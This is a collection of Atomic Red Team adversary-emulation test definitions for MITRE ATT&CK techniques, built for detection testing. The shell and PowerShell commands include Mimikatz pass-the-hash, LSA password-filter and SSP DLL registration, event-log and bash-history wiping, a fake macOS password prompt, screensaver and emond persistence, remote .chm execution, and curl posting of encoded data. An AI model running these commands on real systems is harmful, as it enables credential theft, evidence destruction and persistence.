3 | display_name: Account Manipulation
4 |
5 | atomic_tests:
6 | - name: Admin Account Manipulate
7 | description: |
8 | Manipulate Admin Account Name
9 | supported_platforms:
10 | - windows
11 | executor:
12 | name: powershell
13 | command: |
14 | $x = Get-Random -Minimum 2 -Maximum 9999
15 | $y = Get-Random -Minimum 2 -Maximum 9999
16 | $z = Get-Random -Minimum 2 -Maximum 9999
17 | $w = Get-Random -Minimum 2 -Maximum 9999
18 | Write-Host HaHaHa_$x$y$z$w
19 |
20 | $hostname = (Get-CIMInstance CIM_ComputerSystem).Name
21 |
22 | $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
23 |
24 | foreach($member in $fmm) {
25 | if($member -like "*Administrator*") {
26 | Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
27 | Write-Host "Successfully Renamed Administrator Account on" $hostname
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/tests/T1062/T1062.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1062
3 | display_name: Hypervisor
4 |
5 | atomic_tests:
6 | - name: Installing Hyper-V Feature
7 | description: |
8 | PowerShell command to check if Hyper-v is installed .
9 | Install Hyper-V feature.
10 | Create a New-VM
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | hostname:
17 | description: Host to query to see if Hyper-V feature is installed.
18 | type: string
19 | default: test-vm
20 | vm_name:
21 | description: Create a new VM.
22 | type: string
23 | default: testvm
24 | file_location:
25 | description: Location of new VHDX file
26 | type: string
27 | default: C:\Temp\test.vhdx
28 |
29 | executor:
30 | name: powershell
31 | command: |
32 | Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
33 | Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
34 | New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
35 |
--------------------------------------------------------------------------------
/tests/T1223/T1223.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1223
3 | display_name: Compiled HTML File
4 |
5 | atomic_tests:
6 | - name: Compiled HTML Help Local Payload
7 | description: |
8 | Uses hh.exe to execute a local compiled HTML Help payload.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | local_chm_file:
15 | description: Local .chm payload
16 | type: path
17 | default: C:\atomic-red-team\atomics\T1223\src\T1223.chm
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | hh.exe #{local_chm_file}
23 |
24 | - name: Compiled HTML Help Remote Payload
25 | description: |
26 | Uses hh.exe to execute a remote compiled HTML Help payload.
27 |
28 | supported_platforms:
29 | - windows
30 |
31 | input_arguments:
32 | remote_chm_file:
33 | description: Remote .chm payload
34 | type: url
35 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1223/src/T1223.chm
36 |
37 | executor:
38 | name: command_prompt
39 | command: |
40 | hh.exe #{remote_chm_file}
--------------------------------------------------------------------------------
/tests/T1064/T1064.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1064
3 | display_name: Scripting
4 | tactic: Defense Evasion, Execution
5 | description: Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
6 |
7 | atomic_tests:
8 | - name: Create and Execute scripts
9 | description: |
10 | Creates and executes a simple bash script.
11 |
12 | supported_platforms:
13 | - macos
14 | - linux
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
20 | sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
21 | chmod +x /tmp/art.sh
22 | sh /tmp/art.sh
--------------------------------------------------------------------------------
/tests/T1174/T1174.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1174
3 | display_name: Password Filter DLL
4 |
5 | atomic_tests:
6 | - name: Install and Register Password Filter DLL
7 | description: |
8 | Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_dll:
15 | description: Path to DLL to be installed and registered
16 | type: Path
17 | default: C:\AtomicRedTeam\atomics\T1174\src\AtomicPasswordFilter.dll
18 |
19 | executor:
20 | name: powershell
21 | command: |
22 | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
23 | $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
24 | $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
25 | $notificationPackagesValues += $passwordFilterName
26 | Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
27 | Restart-Computer -Confirm
--------------------------------------------------------------------------------
/tests/T1123/T1123.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1123
3 | display_name: Audio Capture
4 |
5 | atomic_tests:
6 | - name: SourceRecorder via Windows command prompt
7 | description: |
8 | Create a file called test.wma, with the duration of 30 seconds
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | output_file:
15 | description: Path to the recording file being captured
16 | type: Path
17 | default: test.wma
18 |
19 | duration_hms:
20 | description: Duration of audio to be recorded (in h:m:s format)
21 | type: Path
22 | default: 0000:00:30
23 |
24 | executor:
25 | name: command_prompt
26 | command: |
27 | SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
28 |
29 | - name: PowerShell Cmdlet via Windows command prompt
30 | description: |
31 | [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
32 | supported_platforms:
33 | - windows
34 | executor:
35 | name: command_prompt
36 | command: |
37 | powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
38 |
--------------------------------------------------------------------------------
/tests/T1113/T1113.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1113
3 | display_name: Screen Capture
4 | tactic: Collection
5 | description: Adversaries may attempt to get a listing of local system or domain accounts. Windows commands that can acquire this information are net user, net group , and net localgroup using the Net utility or through use of dsquery.
6 |
7 | atomic_tests:
8 | - name: Screencapture
9 | description: |
10 | Use screencapture command to collect a full desktop screenshot
11 | Use xwd command to collect a full desktop screenshot and review file with xwud
12 | Use import command to collect a full desktop screenshot
13 |
14 | supported_platforms:
15 | - macos
16 | - linux
17 |
18 | input_arguments:
19 | output_file:
20 | description: |
21 | xxx
22 | type: Path
23 | default: desktop.png
24 |
25 | executor_nix:
26 | name: bash
27 | command: |
28 | screencapture #{output_file}
29 | screencapture -x #{output_file}
30 | xwd -root -out #{output_file}
31 | xwud -in #{output_file}
32 | import -window root #{output_file}
--------------------------------------------------------------------------------
/tests/T1031/T1031.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1031
3 | display_name: Modify Existing Service
4 | tactic: Persistence
5 | description: Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg. Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API.
6 |
7 | atomic_tests:
8 | - name: Modify Fax service to run PowerShell
9 | description: |
10 | This test will temporarily modify the service Fax by changing the binPath to PowerShell
11 | and will then revert the binPath change, restoring Fax to its original state.
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_cmd:
17 | name: command_prompt
18 | command: |
19 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
20 | sc start Fax
21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
22 |
--------------------------------------------------------------------------------
/tests/T1216/payloads/T1216.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
22 |
23 |
--------------------------------------------------------------------------------
/tests/T1148/T1148.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1148
3 | display_name: HISTCONTROL
4 | tactic: Defense Evasion
5 | description: The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples.
6 |
7 | atomic_tests:
8 | - name: Disable history collection
9 | description: |
10 | Disables history collection in shells
11 |
12 | supported_platforms:
13 | - linux
14 | - macos
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | export HISTCONTROL=ignoreboth
20 | ls #{evil_command}
21 |
22 | executor_man:
23 | name: manual
24 | steps: |
25 | 1. export HISTCONTROL=ignoreboth
26 | 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
27 | 3. ls
28 | 4. whoami > recon.txt
29 |
--------------------------------------------------------------------------------
/tests/T1070/T1070.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1070
3 | display_name: Indicator Removal on Host
4 | tactic: Defense Evasion
5 | description: Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.
6 |
7 | atomic_tests:
8 | - name: Clear Logs
9 | description: |
10 | Clear Windows Event Logs
11 | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
12 | Delete system and audit logs
13 |
14 | supported_platforms:
15 | - windows
16 | - macos
17 | - linux
18 |
19 | executor_cmd:
20 | name: command_prompt
21 | command: |
22 | wevtutil cl #{log_name}
23 | fsutil #{usn deletejournal /D C:}
24 |
25 | executor_nix:
26 | name: sh
27 | command: |
28 | rm -rf /private/var/log/system.log*
29 | rm -rf /private/var/audit/*
30 |
--------------------------------------------------------------------------------
/tests/T1141/T1141.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1141
3 | display_name: Input Prompt
4 | tactic: Credential Access
5 | description: When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task. Adversaries can mimic this functionality to prompt users for credentials with a normal-looking prompt. This type of prompt can be accomplished with AppleScript.
6 |
7 | atomic_tests:
8 | - name: Prompt User for Password
9 | description: |
10 | Prompt User for Password (Local Phishing)
11 | Reference: "http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html"
12 |
13 | supported_platforms:
14 | - macos
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
20 |
--------------------------------------------------------------------------------
/tests/T1132/T1132.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1132
3 | display_name: Data Encoding
4 | tactic: Command and Control
5 | description: Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. Some data encoding systems may also result in data compression, such as gzip.
6 |
7 | atomic_tests:
8 | - name: Base64 Encoded data.
9 | description: |
10 | Utilizing a common technique for posting base64 encoded data.
11 |
12 | supported_platforms:
13 | - macos
14 | - linux
15 |
16 | input_arguments:
17 | destination_url:
18 | description: Destination URL to post encoded data.
19 | type: string
20 | default: redcanary.com
21 | base64_data:
22 | description: Encoded data to post using fake Social Security number 111-11-1111.
23 | type: string
24 | default: MTExLTExLTExMTE=
25 |
26 | executor_nix:
27 | name: sh
28 | command: |
29 | echo -n 111-11-1111 | base64
30 | curl -XPOST #{base64_data}.#{destination_url}
31 |
--------------------------------------------------------------------------------
/tests/T1022/T1022.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1022
3 | display_name: Data Encrypted
4 | tactic: Exfiltration
5 | description: Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
6 |
7 | atomic_tests:
8 | - name: Data Encryption
9 | description: |
10 | Encrypt data
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor_nix:
19 | name: sh
20 | command: |
21 | echo "This file will be encrypted" > /tmp/victim-gpg.txt
22 | mkdir /tmp/victim-files
23 | cd /tmp/victim-files
24 | touch a b c d e f g
25 | zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/*
26 | gpg -c /tmp/victim-gpg.txt
27 |
28 | ls -l
29 |
--------------------------------------------------------------------------------
/tests/T1101/T1101.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1101
3 | display_name: Security Support Provider
4 |
5 | atomic_tests:
6 | - name: Modify SSP configuration in registry
7 | description: Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
8 | supported_platforms:
9 | - windows
10 | input_arguments:
11 | fake_ssp_dll:
12 | description: Value added to registry key. Normally refers to a DLL name in C:\Windows\System32.
13 | type: String
14 | default: not-a-ssp
15 |
16 | executor:
17 | name: powershell
18 | command: |
19 | # run these in sequence
20 | $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
21 | $SecurityPackagesUpdated = $SecurityPackages
22 | $SecurityPackagesUpdated += "#{fake_ssp_dll}"
23 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
24 |
25 | # revert (before reboot)
26 | Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
27 |
--------------------------------------------------------------------------------
/tests/T1142/T1142.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1142
3 | display_name: Keychain
4 | tactic: Credential Access
5 | description: Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
6 |
7 | atomic_tests:
8 | - name: Keychain
9 | description: |
10 | ### Keychain Files
11 |
12 | ~/Library/Keychains/
13 |
14 | /Library/Keychains/
15 |
16 | /Network/Library/Keychains/
17 |
18 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
19 |
20 | [Keychain dumper](https://github.com/juuso/keychaindump)
21 |
22 | supported_platforms:
23 | - macos
24 |
25 | executor_nix:
26 | name: sh
27 | command: |
28 | security -h
29 | security find-certificate -a -p > allcerts.pem
30 | security import /tmp/certs.pem -k
31 |
--------------------------------------------------------------------------------
/tests/T1146/T1146.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1146
3 | display_name: Clear Command History
4 | tactic: Defense Evasion
5 | description: macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE.
6 |
7 | atomic_tests:
8 | - name: Clear Bash history (rm)
9 | description: |
10 | Clears bash history via rm
11 | Clears bash history vie echo
12 | Clears bash history via cat /dev/null
13 | Clears bash history via a symlink to /dev/null
14 | Clears bash history via truncate
15 | Clears the history of a bunch of different shell types by setting the history size to zero
16 |
17 | supported_platforms:
18 | - linux
19 | - macos
20 |
21 | executor_nix:
22 | name: sh
23 | command: |
24 | rm ~/.bash_history
25 | echo "" > ~/.bash_history
26 | cat /dev/null > ~/.bash_history
27 | ln -sf /dev/null ~/.bash_history
28 | truncate -s0 ~/.bash_history
29 | unset HISTFILE
30 | export HISTFILESIZE=0
31 | history -c
32 |
--------------------------------------------------------------------------------
/tests/T1180/T1180.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1180
3 | display_name: Screensaver
4 |
5 | atomic_tests:
6 | - name: Set Arbitrary Binary as Screensaver
7 | description: |
8 | This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_binary:
15 | description: Executable binary to use in place of screensaver for persistence
16 | type: path
17 | default: C:\Windows\System32\cmd.exe
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
23 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
24 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverTimeout /t REG_SZ /d 60 /f
25 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
26 | reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
27 | shutdown /r /t 0
28 |
29 |
--------------------------------------------------------------------------------
/tests/T1150/T1150.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1150
3 | display_name: Plist Modification
4 | tactic: Defense Evasion, Persistence, Privilege Escalation
5 | description: Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism.
6 |
7 | atomic_tests:
8 | - name: Plist Modification
9 | description: |
10 | Modify PlistTODO
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor_man:
16 | name: manual
17 | steps: |
18 | 1. Modify a .plist in
19 |
20 | /Library/Preferences
21 |
22 | OR
23 |
24 | ~/Library/Preferences
25 |
26 | 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
27 |
28 |
29 |
--------------------------------------------------------------------------------
/tests/T1165/T1165.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1165
3 | display_name: Startup Items
4 |
5 | atomic_tests:
6 | - name: Startup Items
7 | description: |
8 | Modify or create an file in StartupItems
9 |
10 | [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor:
16 | name: manual
17 | steps: |
18 | 1. /Library/StartupItems/StartupParameters.plist
19 |
20 | - name: Startup Items (emond rule)
21 | description: |
22 | Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
23 |
24 | supported_platforms:
25 | - macos
26 |
27 | input_arguments:
28 | plist:
29 | description: Path to emond plist file
30 | type: path
31 | default: /path/to/T1165_emond.plist
32 |
33 | executor:
34 | name: sh
35 | command: |
36 | sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist
37 | sudo touch /private/var/db/emondClients/T1165
38 | #Clean up
39 | sudo rm /etc/emond.d/rules/T1165_emond.plist
40 | sudo rm /private/var/db/emondClients/T1165
41 |
--------------------------------------------------------------------------------
/tests/T1165/T1165_emond.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | name
7 | Atomic Red Team T1165
8 | enabled
9 |
10 | eventTypes
11 |
12 | startup
13 |
14 | actions
15 |
16 |
17 | command
18 | /bin/sleep
19 | user
20 | root
21 | arguments
22 |
23 | 30
24 |
25 | type
26 | RunCommand
27 |
28 |
29 | command
30 | /usr/bin/say
31 | user
32 | root
33 | arguments
34 |
35 | -v
36 | Karen
37 | Hello from Atomic Red Team technique T1165
38 |
39 | type
40 | RunCommand
41 |
42 |
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/tests/T1164/T1164.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1164
3 | display_name: Re-Opened Applications
4 |
5 | atomic_tests:
6 | - name: Re-Opened Applications
7 | description: |
8 | Plist Method
9 |
10 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor:
16 | name: manual
17 | steps: |
18 | 1. create a custom plist:
19 |
20 | ~/Library/Preferences/com.apple.loginwindow.plist
21 |
22 | or
23 |
24 | ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist
25 |
26 | - name: Re-Opened Applications
27 | description: |
28 | Mac Defaults
29 |
30 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
31 |
32 | supported_platforms:
33 | - macos
34 |
35 | input_arguments:
36 | script:
37 | description: path to script
38 | type: path
39 | default: /path/to/script
40 |
41 | executor:
42 | name: sh
43 | command: |
44 | sudo defaults write com.apple.loginwindow LoginHook #{script}
45 | sudo defaults delete com.apple.loginwindow LoginHook
46 |
--------------------------------------------------------------------------------
/tests/T1159/T1159.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1159
3 | display_name: Launch Agent
4 |
5 | atomic_tests:
6 | - name: Launch Agent
7 | description: |
8 | Create a plist and execute it
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. Create file - .client
17 |
18 | 2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
19 |
20 | 3. Place the following in a new file under ~/Library/LaunchAgents as com.atomicredteam.plist
21 |
22 | 4.
23 |
24 |
25 |
26 |
27 | KeepAlive
28 |
29 | Label
30 | com.client.client
31 | ProgramArguments
32 |
33 | /Users//.client
34 |
35 | RunAtLoad
36 |
37 | NSUIElement
38 | 1
39 |
40 |
41 |
42 | 5. launchctl load -w ~/Library/LaunchAgents/com.atomicredteam.plist
43 |
--------------------------------------------------------------------------------
/tests/T1085/T1085.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
10 |
11 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
28 |
29 |
30 |
31 |
32 |
33 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/tests/T1140/T1140.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1140
3 | display_name: Deobfuscate/Decode Files Or Information
4 |
5 | atomic_tests:
6 | - name: Deobfuscate/Decode Files Or Information
7 | description: |
8 | Encode/Decode executable
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | executable:
15 | description: name of executable
16 | type: path
17 | default: c:\file.exe
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | certutil.exe -encode #{executable} file.txt
23 | certutil.exe -decode file.txt #{executable}
24 |
25 | - name: Certutil Rename and Decode
26 | description: |
27 | Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
28 |
29 | supported_platforms:
30 | - windows
31 |
32 | input_arguments:
33 | executable:
34 | description: name of executable/file to decode
35 | type: path
36 | default: c:\file.exe
37 |
38 | executor:
39 | name: command_prompt
40 | command: |
41 | cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
42 | cmd.exe /c %temp%tcm.tmp -decode #{executable}
43 |
--------------------------------------------------------------------------------
/tests/T1118/src/T1118.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.Diagnostics;
4 | using System.Reflection;
5 | using System.Configuration.Install;
6 | using System.Runtime.InteropServices;
7 |
8 | /*
9 | Author: Casey Smith, Twitter: @subTee
10 | License: BSD 3-Clause
11 | Step One:
12 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
13 | Step Two:
14 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
15 | */
16 |
17 | public class Program
18 | {
19 | public static void Main()
20 | {
21 | Console.WriteLine("Hey There From Main()");
22 | //Add any behaviour here to throw off sandbox execution/analysts :)
23 | //These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
24 | //by InstallUtil.exe
25 | }
26 |
27 | }
28 |
29 | [System.ComponentModel.RunInstaller(true)]
30 | public class Sample : System.Configuration.Install.Installer
31 | {
32 | //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
33 | public override void Uninstall(System.Collections.IDictionary savedState)
34 | {
35 |
36 | Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.\n");
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/tests/T1010/T1010.md:
--------------------------------------------------------------------------------
1 | # T1010 - Application Window Discovery
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1010)
3 | Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
4 |
5 | In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.
6 |
7 | ## Atomic Tests
8 |
9 | - [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
10 |
11 |
12 |
13 |
14 | ## Atomic Test #1 - List Process Main Windows - C# .NET
15 | Compiles and executes C# code to list main window titles associated with each process.
16 |
17 | **Supported Platforms:** Windows
18 |
19 |
20 | #### Inputs
21 | | Name | Description | Type | Default Value |
22 | |------|-------------|------|---------------|
23 | | input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs|
24 | | output_file_name | Name of output binary | string | T1010.exe|
25 |
26 | #### Run it with `command_prompt`!
27 | ```
28 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
29 | #{output_file_name}
30 | ```
31 |
--------------------------------------------------------------------------------
/tests/T1065/T1065.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1065
3 | display_name: Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls.
4 |
5 | atomic_tests:
6 | - name: Testing usage of uncommonly used port with PowerShell
7 | description: |
8 | Testing uncommonly used port utilizing PowerShell
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | port:
15 | description: Specify uncommon port number
16 | type: String
17 | default: "8081"
18 | domain:
19 | description: Specify target hostname
20 | type: String
21 | default: google.com
22 |
23 | executor:
24 | name: powershell
25 | command: |
26 | test-netconnection -ComputerName #{domain} -port #{port}
27 |
28 | - name: Testing usage of uncommonly used port
29 | description: |
30 | Testing uncommonly used port utilizing telnet.
31 |
32 | supported_platforms:
33 | - linux
34 | - macos
35 |
36 | input_arguments:
37 | port:
38 | description: Specify uncommon port number
39 | type: String
40 | default: "8081"
41 | domain:
42 | description: Specify target hostname
43 | type: String
44 | default: google.com
45 |
46 | executor:
47 | name: sh
48 | command: |
49 | telnet #{domain} #{port}
50 |
--------------------------------------------------------------------------------
/tests/T1075/T1075.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1075
3 | display_name: Pass the Hash
4 |
5 | atomic_tests:
6 | - name: Mimikatz Pass the Hash
7 | description: |
8 | Note: must dump hashes first
9 | [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | input_arguments:
15 | user_name:
16 | description: username
17 | type: string
18 | default: Administrator
19 | domain:
20 | description: domain
21 | type: string
22 | default: atomic.local
23 | ntlm:
24 | description: ntlm hash
25 | type: string
26 | default: cc36cf7a8514893efccd3324464tkg1a
27 |
28 | executor:
29 | name: command_prompt
30 | command: |
31 | mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
32 |
33 | - name: Mimikatz Kerberos Ticket Attack
34 | description: |
35 | Similar to PTH, but attacking Kerberos
36 |
37 | supported_platforms:
38 | - windows
39 |
40 | input_arguments:
41 | user_name:
42 | description: username
43 | type: string
44 | default: Administrator
45 | domain:
46 | description: domain
47 | type: string
48 | default: atomic.local
49 |
50 | executor:
51 | name: command_prompt
52 | command: |
53 | mimikatz # kerberos::ptt #{user_name}@#{domain}
54 |
--------------------------------------------------------------------------------
/tests/T1122/src/COMHijack.reg:
--------------------------------------------------------------------------------
1 | Windows Registry Editor Version 5.00
2 | [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
3 | @="AtomicRedTeam"
4 | [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
5 | @="{00000001-0000-0000-0000-0000FEEDACDC}"
6 | [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
7 | @="AtomicRedTeam"
8 | [HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
9 | @="{00000001-0000-0000-0000-0000FEEDACDC}"
10 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
11 | @="AtomicRedTeam"
12 | [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
13 | @="C:\\WINDOWS\\system32\\scrobj.dll"
